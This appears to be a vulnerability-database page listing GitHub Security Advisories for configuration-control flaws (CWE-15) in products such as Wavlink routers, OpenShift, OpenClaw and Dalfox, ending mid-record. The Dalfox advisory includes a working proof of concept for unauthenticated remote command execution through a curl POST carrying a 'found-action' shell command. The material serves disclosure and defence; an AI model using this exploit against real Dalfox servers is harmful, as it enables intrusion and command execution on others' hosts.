CWE-15
AllowedExternal Control of System or Configuration Setting
Abstraction: Base · Status: Incomplete
One or more system settings or configuration elements can be externally controlled by a user.
137 vulnerabilities reference this CWE, most recent first.
GHSA-Q9QG-X25C-5Q6J
Vulnerability from github – Published: 2024-12-12 12:31 – Updated: 2024-12-12 12:31Security vulnerability in the HiView module Impact: Successful exploitation of this vulnerability may affect feature implementation and integrity.
{
"affected": [],
"aliases": [
"CVE-2024-54097"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-12T12:15:23Z",
"severity": "HIGH"
},
"details": "Security vulnerability in the HiView module\nImpact: Successful exploitation of this vulnerability may affect feature implementation and integrity.",
"id": "GHSA-q9qg-x25c-5q6j",
"modified": "2024-12-12T12:31:15Z",
"published": "2024-12-12T12:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54097"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2024/12"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QCJ9-WWGW-6GM8
Vulnerability from github – Published: 2026-04-03 02:47 – Updated: 2026-05-06 02:40Summary
Workspace .env can override the bundled plugin trust root
Current Maintainer Triage
- Status: open
- Normalized severity: high
- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.
Affected Packages / Versions
- Package:
openclaw(npm) - Latest published npm version:
2026.3.31 - Vulnerable version range:
<=2026.3.28 - Patched versions:
>= 2026.3.31 - First stable tag containing the fix:
v2026.3.31
Fix Commit(s)
330a9f98cb29c79b1c16a2117e03d6276a0d6289— 2026-03-31T19:25:12+09:00
OpenClaw thanks @nexrin for reporting.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2026.3.28"
},
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.3.31"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41396"
],
"database_specific": {
"cwe_ids": [
"CWE-15",
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T02:47:57Z",
"nvd_published_at": "2026-04-28T19:37:43Z",
"severity": "HIGH"
},
"details": "## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.28`\n- Patched versions: `\u003e= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` \u2014 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.",
"id": "GHSA-qcj9-wwgw-6gm8",
"modified": "2026-05-06T02:40:28Z",
"published": "2026-04-03T02:47:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw: Workspace `.env` can override the bundled plugin trust root"
}
GHSA-QMRP-JX57-5MR7
Vulnerability from github – Published: 2026-06-02 09:36 – Updated: 2026-07-02 00:31The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration.
{
"affected": [],
"aliases": [
"CVE-2026-1784"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-02T09:16:15Z",
"severity": "HIGH"
},
"details": "The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration.",
"id": "GHSA-qmrp-jx57-5mr7",
"modified": "2026-07-02T00:31:39Z",
"published": "2026-06-02T09:36:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1784"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:23241"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:23246"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:25045"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:25182"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:25194"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:26543"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:28893"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:28964"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-1784"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436075"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-1784.json"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QPWG-QXX8-4G59
Vulnerability from github – Published: 2025-02-18 09:32 – Updated: 2025-02-18 09:32Via the GUI of the "bestinformed Infoclient", a low-privileged user is by default able to change the server address of the "bestinformed Server" to which this client connects. This is dangerous as the "bestinformed Infoclient" runs with elevated permissions ("nt authority\system"). By changing the server address to a malicious server, or a script simulating a server, the user is able to escalate his privileges by abusing certain features of the "bestinformed Web" server. Those features include: * Pushing of malicious update packages * Arbitrary Registry Read as "nt authority\system"
An attacker is able to escalate his privileges to "nt authority\system" on the Windows client running the "bestinformed Infoclient".
This attack is not possible if a custom configuration ("Infoclient.ini") containing the flags "ShowOnTaskbar=false" or "DisabledItems=stPort,stAddress" is deployed.
{
"affected": [],
"aliases": [
"CVE-2025-0425"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-18T08:15:10Z",
"severity": "HIGH"
},
"details": "Via the GUI of the \"bestinformed Infoclient\", a low-privileged user is by default able to change the server address of the \"bestinformed Server\" to which this client connects. This is dangerous as the \"bestinformed Infoclient\" runs with elevated permissions (\"nt authority\\system\"). By changing the server address to a malicious server, or a script simulating a server, the user is able to escalate his privileges by abusing certain features of the \"bestinformed Web\" server. Those features include:\n * Pushing of malicious update packages\n * Arbitrary Registry Read as \"nt authority\\system\"\n\n\nAn attacker is able to escalate his privileges to \"nt authority\\system\" on the Windows client running the \"bestinformed Infoclient\".\u00a0\n\n\nThis attack is not possible if a custom configuration (\"Infoclient.ini\")\u00a0containing the flags \"ShowOnTaskbar=false\" or \"DisabledItems=stPort,stAddress\" is deployed.",
"id": "GHSA-qpwg-qxx8-4g59",
"modified": "2025-02-18T09:32:45Z",
"published": "2025-02-18T09:32:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0425"
},
{
"type": "WEB",
"url": "https://www.cordaware.com/changelog/en/version-6_3_8_1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-QXH2-8JW8-HX7G
Vulnerability from github – Published: 2025-01-14 15:30 – Updated: 2025-11-04 00:32Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the ftp_max_sessions POST parameter.
{
"affected": [],
"aliases": [
"CVE-2024-39795"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-14T15:15:24Z",
"severity": "CRITICAL"
},
"details": "Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `ftp_max_sessions` POST parameter.",
"id": "GHSA-qxh2-8jw8-hx7g",
"modified": "2025-11-04T00:32:17Z",
"published": "2025-01-14T15:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39795"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2053"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2053"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R3RJ-4MRF-V5MF
Vulnerability from github – Published: 2025-01-14 15:30 – Updated: 2025-11-04 00:32Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the sel_open_interface POST parameter.
{
"affected": [],
"aliases": [
"CVE-2024-39799"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-14T15:15:25Z",
"severity": "CRITICAL"
},
"details": "Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `sel_open_interface` POST parameter.",
"id": "GHSA-r3rj-4mrf-v5mf",
"modified": "2025-11-04T00:32:17Z",
"published": "2025-01-14T15:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39799"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RC26-62RX-429V
Vulnerability from github – Published: 2026-03-04 15:30 – Updated: 2026-03-04 15:30Dell PowerScale OneFS, versions 9.10.0.0 through 9.10.1.5 and versions 9.11.0.0 through 9.12.0.1, contains an external control of system or configuration setting vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to protection mechanism bypass.
{
"affected": [],
"aliases": [
"CVE-2026-21422"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-04T13:15:57Z",
"severity": "LOW"
},
"details": "Dell PowerScale OneFS, versions 9.10.0.0 through 9.10.1.5 and versions 9.11.0.0 through 9.12.0.1, contains an external control of system or configuration setting vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to protection mechanism bypass.",
"id": "GHSA-rc26-62rx-429v",
"modified": "2026-03-04T15:30:34Z",
"published": "2026-03-04T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21422"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-sg/000432452/dsa-2026-038-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-RHVX-9VR4-VMG9
Vulnerability from github – Published: 2025-01-14 15:30 – Updated: 2025-11-04 00:32Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the sel_open_protocol POST parameter.
{
"affected": [],
"aliases": [
"CVE-2024-39798"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-14T15:15:24Z",
"severity": "CRITICAL"
},
"details": "Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `sel_open_protocol` POST parameter.",
"id": "GHSA-rhvx-9vr4-vmg9",
"modified": "2025-11-04T00:32:17Z",
"published": "2025-01-14T15:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39798"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2050"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RPCF-RMH6-42XR
Vulnerability from github – Published: 2025-07-28 21:31 – Updated: 2026-06-04 20:12A vulnerability was found in the netavark package, a network stack for containers used with Podman. Due to dns.podman search domain being removed, netavark may return external servers if a valid A/AAAA record is sent as a response. When creating a container with a given name, this name will be used as the hostname for the container itself, as the podman's search domain is not added anymore the container is using the host's resolv.conf, and the DNS resolver will try to look into the search domains contained on it. If one of the domains contain a name with the same hostname as the running container, the connection will forward to unexpected external servers.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "netavark"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.15.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-8283"
],
"database_specific": {
"cwe_ids": [
"CWE-15"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-29T19:56:11Z",
"nvd_published_at": "2025-07-28T19:15:43Z",
"severity": "LOW"
},
"details": "A vulnerability was found in the netavark package, a network stack for containers used with Podman. Due to dns.podman search domain being removed, netavark may return external servers if a valid A/AAAA record is sent as a response. When creating a container with a given name, this name will be used as the hostname for the container itself, as the podman\u0027s search domain is not added anymore the container is using the host\u0027s resolv.conf, and the DNS resolver will try to look into the search domains contained on it. If one of the domains contain a name with the same hostname as the running container, the connection will forward to unexpected external servers.",
"id": "GHSA-rpcf-rmh6-42xr",
"modified": "2026-06-04T20:12:42Z",
"published": "2025-07-28T21:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8283"
},
{
"type": "WEB",
"url": "https://github.com/containers/podman/issues/2619"
},
{
"type": "WEB",
"url": "https://github.com/containers/podman/issues/26198"
},
{
"type": "WEB",
"url": "https://github.com/containers/netavark/pull/1256"
},
{
"type": "WEB",
"url": "https://github.com/containers/netavark/commit/068abc869b736a03a947b5419c102da73830e882"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-8283"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383941"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-rpcf-rmh6-42xr"
},
{
"type": "PACKAGE",
"url": "https://github.com/containers/netavark"
},
{
"type": "WEB",
"url": "https://github.com/containers/netavark/releases/tag/v1.15.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Netavark Has Possible DNS Resolve Confusion "
}
GHSA-V25V-M36W-JP4H
Vulnerability from github – Published: 2026-05-12 15:07 – Updated: 2026-06-08 23:50GHSA: Unauthenticated Remote Code Execution via found-action in Dalfox Server Mode
Summary
When dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.
Severity
Critical (CVSS 3.1: 10.0)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network — the server binds to
0.0.0.0by default; reachable by any network peer. - Attack Complexity: Low — the attacker fully controls the scanned URL and can trivially host a one-line reflective server to guarantee a finding is triggered.
- Privileges Required: None — no API key is enforced in the default configuration.
- User Interaction: None.
- Scope: Changed — exploitation escapes the dalfox process boundary and executes arbitrary commands on the host OS.
- Confidentiality Impact: High — full read access to the host filesystem and secrets in the process environment.
- Integrity Impact: High — arbitrary file writes, code deployment, persistence mechanisms.
- Availability Impact: High — process kill, resource exhaustion, service disruption.
Affected Component
cmd/server.go—init()(line 51):--api-keydefaults to""pkg/server/server.go—setupEchoServer()(line 68): auth middleware only registered whenAPIKey != ""pkg/server/server.go—postScanHandler()(lines 173–191):rq.Optionspassed toScanFromAPIwithout sanitizationlib/func.go—Initialize()(lines 118–119):FoundAction/FoundActionShellexplicitly propagated from caller optionspkg/scanning/foundaction.go—foundAction()(lines 17–18):exec.Command(options.FoundActionShell, "-c", afterCmd)executed unconditionally
CWE
- CWE-306: Missing Authentication for Critical Function
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- CWE-15: External Control of System or Configuration Setting
Description
Opt-in Authentication with a Dangerous Default
cmd/server.go registers the --api-key flag with an empty string default:
// cmd/server.go:51
serverCmd.Flags().StringVar(&apiKey, "api-key", "", "Specify the API key for server authentication...")
setupEchoServer only installs the apiKeyAuth middleware when that value is non-empty:
// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
e.Use(apiKeyAuth(options.APIKey, options))
}
A server started without --api-key accepts every request on every route with no challenge. The apiKeyAuth implementation itself is correct — the flaw is purely in the opt-in condition that makes authentication off by default.
Attacker-Controlled Options Reaches Shell Execution Without Stripping
POST /scan deserializes the full model.Options struct from the JSON body:
// pkg/server/model.go:6-8
type Req struct {
URL string `json:"url"`
Options model.Options `json:"options"`
}
// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)
model.Options exposes both execution-control fields as JSON-tagged properties:
// pkg/model/options.go:83-84
FoundAction string `json:"found-action,omitempty"`
FoundActionShell string `json:"found-action-shell,omitempty"`
ScanFromAPI builds the scan target directly from rqOptions and passes it to dalfox.Initialize:
// pkg/server/scan.go:22-27
target := dalfox.Target{
URL: url,
Method: rqOptions.Method,
Options: rqOptions,
}
newOptions := dalfox.Initialize(target, target.Options)
Initialize explicitly copies both fields into newOptions — there is no stripping path:
// lib/func.go:118-119
"FoundAction": {&newOptions.FoundAction, options.FoundAction},
"FoundActionShell": {&newOptions.FoundActionShell, options.FoundActionShell},
Shell Execution on Any Finding
foundAction is called from seven locations across pkg/scanning/scanning.go and pkg/scanning/sendReq.go whenever options.FoundAction != "" and any vulnerability is detected. None of these call sites check options.IsAPI:
// pkg/scanning/foundaction.go:12-18
func foundAction(options model.Options, target, query, ptype string) {
afterCmd := options.FoundAction
afterCmd = strings.ReplaceAll(afterCmd, "@@query@@", query)
afterCmd = strings.ReplaceAll(afterCmd, "@@target@@", target)
afterCmd = strings.ReplaceAll(afterCmd, "@@type@@", ptype)
cmd := exec.Command(options.FoundActionShell, "-c", afterCmd)
err := cmd.Run()
...
}
Because the attacker supplies both the scan target URL and found-action, they trivially guarantee that a finding is produced (by hosting a one-line reflective server) and that the shell command is executed.
Proof of Concept
# Step 1 — Start a reflective XSS target (attacker-controlled)
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def do_GET(self):
q = parse_qs(urlparse(self.path).query).get('q', [''])[0]
body = f'<html><body>{q}</body></html>'.encode()
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(body)))
self.end_headers()
self.wfile.write(body)
def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18081), H).serve_forever()
PY
# Step 2 — Start dalfox in REST server mode (default: 0.0.0.0:6664, no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest
# Step 3 — POST unauthenticated scan request with found-action payload
curl -s -X POST http://127.0.0.1:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://127.0.0.1:18081/?q=test",
"options": {
"found-action": "echo owned >/tmp/dalfox_rce_marker",
"found-action-shell": "bash",
"use-headless": false,
"worker": 1,
"limit-result": 1
}
}'
# Step 4 — Confirm arbitrary command executed on the dalfox host
cat /tmp/dalfox_rce_marker
# Expected output: owned
No X-API-KEY header is required. The reflective server ensures dalfox finds a vulnerability, which triggers foundAction.
Impact
- Unauthenticated remote code execution on any host running
dalfox serverin its default configuration. - Full read access to secrets, configuration files, and credentials visible to the dalfox process.
- Arbitrary file writes: persistence, backdoor installation, data exfiltration staging.
- Lateral movement using the dalfox host's network position and credentials.
- The default
0.0.0.0bind address means exposure to all network interfaces, including public-facing ones in misconfigured cloud environments.
Recommended Remediation
Option 1: Require API key — make --api-key mandatory (preferred)
Reject server startup when no API key is provided and emit a loud warning. This is the lowest-risk fix because it protects all current and future routes without code changes to the scan path.
// cmd/server.go — in runServerCmd, before starting the server:
if serverType == "rest" && apiKey == "" {
fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
fmt.Fprintln(os.Stderr, " Generate a key with: openssl rand -hex 32")
os.Exit(1)
}
Option 2: Strip FoundAction / FoundActionShell from API-sourced requests
Prevent untrusted callers from setting execution-control options regardless of auth state. This adds defence-in-depth and protects authenticated deployments against credential theft.
// pkg/server/server.go — in postScanHandler, before calling ScanFromAPI:
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""
Both options should be applied together. Option 1 prevents unauthenticated access; Option 2 ensures that even authenticated callers (who may be external consumers of the REST API) cannot trigger host-level command execution.
Credit
Emmanuel David
Github:- https://github.com/drmingler
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/hahwul/dalfox/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45087"
],
"database_specific": {
"cwe_ids": [
"CWE-15",
"CWE-306",
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:07:59Z",
"nvd_published_at": "2026-05-27T18:16:24Z",
"severity": "CRITICAL"
},
"details": "# GHSA: Unauthenticated Remote Code Execution via `found-action` in Dalfox Server Mode\n\n## Summary\n\nWhen dalfox is started in REST API server mode (`dalfox server`), the server binds to `0.0.0.0:6664` by default and requires no API key unless the operator explicitly passes `--api-key`. Because `model.Options` \u2014 including `FoundAction` and `FoundActionShell` \u2014 is deserialized directly from attacker-supplied JSON in `POST /scan`, and because `dalfox.Initialize` explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.\n\n## Severity\n\n**Critical** (CVSS 3.1: 10.0)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`\n\n- **Attack Vector:** Network \u2014 the server binds to `0.0.0.0` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 the attacker fully controls the scanned URL and can trivially host a one-line reflective server to guarantee a finding is triggered.\n- **Privileges Required:** None \u2014 no API key is enforced in the default configuration.\n- **User Interaction:** None.\n- **Scope:** Changed \u2014 exploitation escapes the dalfox process boundary and executes arbitrary commands on the host OS.\n- **Confidentiality Impact:** High \u2014 full read access to the host filesystem and secrets in the process environment.\n- **Integrity Impact:** High \u2014 arbitrary file writes, code deployment, persistence mechanisms.\n- **Availability Impact:** High \u2014 process kill, resource exhaustion, service disruption.\n\n\n## Affected Component\n\n- `cmd/server.go` \u2014 `init()` (line 51): `--api-key` defaults to `\"\"`\n- `pkg/server/server.go` \u2014 `setupEchoServer()` (line 68): auth middleware only registered when `APIKey != \"\"`\n- `pkg/server/server.go` \u2014 `postScanHandler()` (lines 173\u2013191): `rq.Options` passed to `ScanFromAPI` without sanitization\n- `lib/func.go` \u2014 `Initialize()` (lines 118\u2013119): `FoundAction` / `FoundActionShell` explicitly propagated from caller options\n- `pkg/scanning/foundaction.go` \u2014 `foundAction()` (lines 17\u201318): `exec.Command(options.FoundActionShell, \"-c\", afterCmd)` executed unconditionally\n\n## CWE\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **CWE-78**: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n- **CWE-15**: External Control of System or Configuration Setting\n\n## Description\n\n### Opt-in Authentication with a Dangerous Default\n\n`cmd/server.go` registers the `--api-key` flag with an empty string default:\n\n```go\n// cmd/server.go:51\nserverCmd.Flags().StringVar(\u0026apiKey, \"api-key\", \"\", \"Specify the API key for server authentication...\")\n```\n\n`setupEchoServer` only installs the `apiKeyAuth` middleware when that value is non-empty:\n\n```go\n// pkg/server/server.go:68-70\nif options.ServerType == \"rest\" \u0026\u0026 options.APIKey != \"\" {\n e.Use(apiKeyAuth(options.APIKey, options))\n}\n```\n\nA server started without `--api-key` accepts every request on every route with no challenge. The `apiKeyAuth` implementation itself is correct \u2014 the flaw is purely in the opt-in condition that makes authentication off by default.\n\n### Attacker-Controlled `Options` Reaches Shell Execution Without Stripping\n\n`POST /scan` deserializes the full `model.Options` struct from the JSON body:\n\n```go\n// pkg/server/model.go:6-8\ntype Req struct {\n URL string `json:\"url\"`\n Options model.Options `json:\"options\"`\n}\n\n// pkg/server/server.go:173-191\nrq := new(Req)\nif err := c.Bind(rq); err != nil { ... }\ngo ScanFromAPI(rq.URL, rq.Options, *options, sid)\n```\n\n`model.Options` exposes both execution-control fields as JSON-tagged properties:\n\n```go\n// pkg/model/options.go:83-84\nFoundAction string `json:\"found-action,omitempty\"`\nFoundActionShell string `json:\"found-action-shell,omitempty\"`\n```\n\n`ScanFromAPI` builds the scan target directly from `rqOptions` and passes it to `dalfox.Initialize`:\n\n```go\n// pkg/server/scan.go:22-27\ntarget := dalfox.Target{\n URL: url,\n Method: rqOptions.Method,\n Options: rqOptions,\n}\nnewOptions := dalfox.Initialize(target, target.Options)\n```\n\n`Initialize` explicitly copies both fields into `newOptions` \u2014 there is no stripping path:\n\n```go\n// lib/func.go:118-119\n\"FoundAction\": {\u0026newOptions.FoundAction, options.FoundAction},\n\"FoundActionShell\": {\u0026newOptions.FoundActionShell, options.FoundActionShell},\n```\n\n### Shell Execution on Any Finding\n\n`foundAction` is called from seven locations across `pkg/scanning/scanning.go` and `pkg/scanning/sendReq.go` whenever `options.FoundAction != \"\"` and any vulnerability is detected. None of these call sites check `options.IsAPI`:\n\n```go\n// pkg/scanning/foundaction.go:12-18\nfunc foundAction(options model.Options, target, query, ptype string) {\n afterCmd := options.FoundAction\n afterCmd = strings.ReplaceAll(afterCmd, \"@@query@@\", query)\n afterCmd = strings.ReplaceAll(afterCmd, \"@@target@@\", target)\n afterCmd = strings.ReplaceAll(afterCmd, \"@@type@@\", ptype)\n cmd := exec.Command(options.FoundActionShell, \"-c\", afterCmd)\n err := cmd.Run()\n ...\n}\n```\n\nBecause the attacker supplies both the scan target URL and `found-action`, they trivially guarantee that a finding is produced (by hosting a one-line reflective server) and that the shell command is executed.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Start a reflective XSS target (attacker-controlled)\npython3 